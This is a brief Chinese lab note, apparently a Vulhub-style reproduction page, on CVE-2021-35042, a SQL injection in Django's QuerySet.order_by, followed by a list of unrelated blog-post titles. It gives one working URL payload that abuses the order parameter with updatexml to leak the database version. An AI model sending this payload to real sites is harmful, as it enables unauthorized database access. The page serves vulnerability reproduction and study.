Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

漏洞描述

Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接:

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

相关推荐
小袁拒绝摆烂5 小时前
一条 SQL 从 30 秒到 300 毫秒:聊聊 MySQL 的 Hash Join
sql·mysql·哈希算法
shirsl6 小时前
数据开发实时项目问题整理
数据库·sql·big data
天衍四九-7 小时前
排查慢SQL用explain分析执行计划,主要关注哪些字段?
数据库·sql
润乾软件9 小时前
SQLazy:多表按 ID 合并为单行
sql·sqlazy
天天喝旺仔11 小时前
PostgreSQL 慢查询治理实战:读懂 EXPLAIN ANALYZE 执行计划,落地复合索引、部分索引与覆盖索引
sql·postgresql·性能优化·数据库开发
一个天蝎座 白勺 程序猿13 小时前
SQL Server数据库迁移实测:金仓KES V9R4C019让存量T-SQL“少量修改”
数据库·sql·kingbasees
嘻哈baby13 小时前
FastAPI + SQLite 从 0 写一个真正能用的待办 API
数据库·sqlite·fastapi
2601_9622838813 小时前
Django数据库配置(一)
mysql·postgresql·django·sqlite·数据库配置
shirsl15 小时前
数据开发每日面试题 Day 1
大数据·数据库·sql·big data
2601_9603563816 小时前
消费者洞察岗项目准备清单:SQL、问卷、用户分层与可视化
大数据·数据库·sql